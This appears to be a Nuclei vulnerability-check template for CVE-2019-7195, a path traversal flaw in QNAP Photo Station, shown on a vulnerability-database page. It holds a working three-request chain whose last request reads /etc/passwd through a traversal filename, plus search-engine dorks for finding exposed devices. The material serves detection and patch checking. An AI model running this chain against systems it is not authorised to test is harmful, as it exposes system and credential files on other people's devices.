id: CVE-2019-7195
info:
name: QNAP Photo Station - Path Traversal
author: s4e-io
severity: critical
description: |
QNAP devices running Photo Station contain an external control of file name or path vulnerability allowing remote attackers to access or modify system files.
impact: |
Unauthenticated attackers can exploit path traversal to access or modify system files, potentially reading sensitive configuration files and credentials.
remediation: |
Upgrade to QNAP Photo Station version that addresses this vulnerability or apply vendor-provided patches.
reference:
- https://cycrafttechnology.medium.com/qnap-pre-auth-root-rce-affecting-312k-devices-on-the-internet-fc8af285622e
- https://packetstorm.news/files/id/157857
- https://github.com/cycraft-corp/cve-2019-7192-check
- https://github.com/qazbnm456/awesome-cve-poc
- https://github.com/th3gundy/CVE-2019-7192_QNAP_Exploit
- https://nvd.nist.gov/vuln/detail/CVE-2019-7195
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2019-7195
cwe-id: CWE-22
epss-score: 0.89681
epss-percentile: 0.99772
cpe: cpe:2.3:a:qnap:photo_station:*:*:*:*:*:*:*:*
metadata:
vendor: qnap
product: photo_station
shodan-query:
- content-length:"580 "http server 1.0""
- http.title:"photo station"
- http.title:"qnap"
fofa-query:
- title="photo station"
- title="qnap"
google-query:
- intitle:"photo station"
- intitle:"qnap"
tags: cve,cve2019,kev,qnap,lfi,vkev,vuln
http:
- raw:
- |
POST /photo/p/api/album.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
a=setSlideshow&f={{to_lower(rand_text_alpha(5))}}
- |
GET /photo/slideshow.php?album={{album_id}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
- |
POST /photo/p/api/video.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
album={{album_id}}&a=caption&ac={{access_code}}&f=UMGObv&filename=.%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
matchers:
- type: dsl
dsl:
- "status_code_3 == 200"
- "regex('admin:', body_3)"
- "contains_all(header_3, 'video/subtitle', 'filename=')"
condition: and
extractors:
- type: regex
name: album_id
part: body_1
group: 1
regex:
- '<output>([a-zA-Z]+)<\/output>'
internal: true
- type: regex
name: access_code
part: body_2
group: 1
regex:
- encodeURIComponent\('([A-Za-z0-9]+)'\)
internal: true
# digest: 4a0a004730450220101dd4939ddb74169e3c4e61c6d49cb257be0932705614e1775cbc31886ba0cb022100b57fe8f6ee97277be44fe705d29279c805f57cbce187c9980b82540cadd1c343:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation